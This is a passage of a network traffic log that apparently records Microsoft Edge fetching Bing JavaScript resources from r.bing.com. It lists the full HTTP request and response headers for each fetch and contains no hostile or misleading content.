sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 07 Jan 2025 15:00:41 GMT
etag: 0x8DD2F2C0E312948
content-length: 2441
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: cHQ92lu+amPs3PeU3KnDRQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ef7fcf8f-601e-0023-562b-61855b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.4c1a1202.1736273572.6698adc3
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=198499
expires: Fri, 14 Mar 2025 09:45:22 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49ebf
timing-allow-origin: *
GET

https://r.bing.com/rp/U6ozRLRanAQTt22qZDWCWxYnh5g.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/U6ozRLRanAQTt22qZDWCWxYnh5g.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/javascript; charset=utf-8
content-md5: igFHcdGkR5305w7cJZk1ow==
last-modified: Fri, 28 Feb 2025 00:41:34 GMT
etag: 0x8DD5790A720357E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 35d1c57b-b01e-004c-71d9-892d8f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 8926
vary: Accept-Encoding
cache-control: public, no-transform, max-age=55177
expires: Wed, 12 Mar 2025 17:56:40 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49ec0
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/E33oPkEFg94JdE52ibDzTAvMDO8.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/E33oPkEFg94JdE52ibDzTAvMDO8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:29:02 GMT
etag: 0x8DCE8C28AC2EAB8
content-length: 2634
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: YP0IUbsZfddh5LfrNKc0vw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 38c317d3-701e-0078-40de-1a8227000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.b5777b5c.1728543050.13879741
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=212973
expires: Fri, 14 Mar 2025 13:46:36 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49ec1
timing-allow-origin: *
GET

https://r.bing.com/rp/KLrSbzDKMog0mCiPcB9iwoEvlE4.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/KLrSbzDKMog0mCiPcB9iwoEvlE4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:26:40 GMT
etag: 0x8DCDC61D9BDA003
content-length: 932
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 4vFQ72ZNf8ORyGv0/A7BUA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9d961b2a-a01e-0058-3d94-16eeeb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=218661
expires: Fri, 14 Mar 2025 15:21:24 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49ec2
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/TaNyfCzxqBX9l7QZbgZUegopTuI.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/TaNyfCzxqBX9l7QZbgZUegopTuI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:32:42 GMT
etag: 0x8DCE8C30DC01669
content-length: 250
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: e7f/zlZuzAgnEk3uqGLnHQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1c8cd8bd-201e-0060-58de-1aafb2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=240104
expires: Fri, 14 Mar 2025 21:18:47 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49ec3
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/cfKt7bw67nxWZkkgOIRReDE3rQI.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/cfKt7bw67nxWZkkgOIRReDE3rQI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:13:32 GMT
etag: 0x8DCDC600424C39F
content-length: 409
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: BteUZH4yORsv/669vnijjQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d8b504a8-701e-0037-4f21-17463f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.95777b5c.1730251573.9adebd3
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=222026
expires: Fri, 14 Mar 2025 16:17:29 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49ec4
timing-allow-origin: *
GET

https://r.bing.com/rp/LJBbk33xj0wpN1yZ2F5CHaTSir0.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/LJBbk33xj0wpN1yZ2F5CHaTSir0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 16 Dec 2024 11:02:51 GMT
etag: 0x8DD1DC12F5170F5
content-length: 1184
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: vG1h+ad2ByVr1L4MKJZ7kQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9a7b2d54-b01e-0008-57e1-4ff1e3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=212357
expires: Fri, 14 Mar 2025 13:36:20 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49ec5
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/6O1CvNJpGB5T4QGvosksEhnIbo4.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/6O1CvNJpGB5T4QGvosksEhnIbo4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:11:30 GMT
etag: 0x8DCDC5FBB9234C6
content-length: 395
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: bJNwzHWywBuWP28bX2mBGQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 34450cb7-001e-0011-4af1-15dd8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=153129
expires: Thu, 13 Mar 2025 21:09:12 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49ec6
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/K3hC1_cQXGFr6cxRJVWYpzZJaAM.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/K3hC1_cQXGFr6cxRJVWYpzZJaAM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:32:51 GMT
etag: 0x8DCE8C3132785D7
content-length: 5065
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: zen1RFa4GLG9w/XJIRfohw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4527fc94-701e-001e-76de-1a307d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=212235
expires: Fri, 14 Mar 2025 13:34:18 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49ec7
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/n23ANye7L3wtUcgKxoGHb7_ezc4.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/n23ANye7L3wtUcgKxoGHb7_ezc4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:29:32 GMT
etag: 0x8DCE8C29C4714A6
content-length: 64359
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: yBOhuH8WUdZCzcrV/Ken2A==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9f8884ab-801e-0000-0b6d-1eea90000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=168702
expires: Fri, 14 Mar 2025 01:28:45 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49ec8
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/DmYomXZ0p9--syG1mm6CnQwvRHg.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/DmYomXZ0p9--syG1mm6CnQwvRHg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 27 Feb 2025 04:17:22 GMT
etag: 0x8DD56E5A26123DA
content-length: 69528
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: zGPsX4liBBcn86INaieDKQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9ed0f7ce-501e-0009-30e8-88f01e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=123468
expires: Thu, 13 Mar 2025 12:54:51 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49ec9
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/bL7uhPj2SPbCSE6JNLGJunbq64E.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/bL7uhPj2SPbCSE6JNLGJunbq64E.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:26:57 GMT
etag: 0x8DCDC61E3F44079
content-length: 1218
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 3+rYbha1WoVmHqd+xAo16Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: abe7b83f-901e-0036-4867-1947c2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=415004
expires: Sun, 16 Mar 2025 21:53:47 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49eca
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/TjyWAmemrltxca9Tew0hTL__JHg.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/TjyWAmemrltxca9Tew0hTL__JHg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:55:01 GMT
etag: 0x8DCDC65D005C0E0
content-length: 430
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: l5PXwpOyUFdqY44wmnrCag==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e3b79e41-d01e-0075-0173-156d2b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=134383
expires: Thu, 13 Mar 2025 15:56:46 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49ecb
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/lLk8XmbdNzzlnPRzVzDhaF9yjqw.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/lLk8XmbdNzzlnPRzVzDhaF9yjqw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:06:53 GMT
etag: 0x8DCDC5F1663B480
akamai-grn: 0.b0777b5c.1737620692.10f2bfbc
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: wQmZQwuzNQKGWvk013IgpA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6610645e-101e-002c-1bc2-1768ad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 738
cache-control: public, no-transform, max-age=65238
expires: Wed, 12 Mar 2025 20:44:21 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49ecc
timing-allow-origin: *
GET

https://r.bing.com/rp/Gyuq2bqitqDJM0BeAkbKXGlQXNw.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/Gyuq2bqitqDJM0BeAkbKXGlQXNw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:57:19 GMT
etag: 0x8DCDC66220B7293
content-length: 806
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: hRrTe9xFPcEQGLGPgVvjhw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d52007ef-d01e-0031-380a-16b147000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=43229
expires: Wed, 12 Mar 2025 14:37:32 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49f4f
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/n21aGRCN5EKHB3qObygw029dyNU.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/n21aGRCN5EKHB3qObygw029dyNU.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:20:42 GMT
etag: 0x8DCDC6104407DFA
content-length: 201
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: M3bjJ0CAgDmqFQQM+Mcpeg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7a5fac1f-901e-001f-44f7-163180000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=216089
expires: Fri, 14 Mar 2025 14:38:32 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49f50
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/PmNLAq2f0t_lcD3LTchFOVy6h-U.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/PmNLAq2f0t_lcD3LTchFOVy6h-U.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:52:56 GMT
etag: 0x8DCDC5D2377F40E
content-length: 156
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 0ApKmxnWdlgJ/r3VvxbmFQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e9f12fea-001e-0055-044d-1701e7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=118195
expires: Thu, 13 Mar 2025 11:26:58 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49f51
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/8CgcSSLayxEVUBf0swP_bQGMId8.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/8CgcSSLayxEVUBf0swP_bQGMId8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
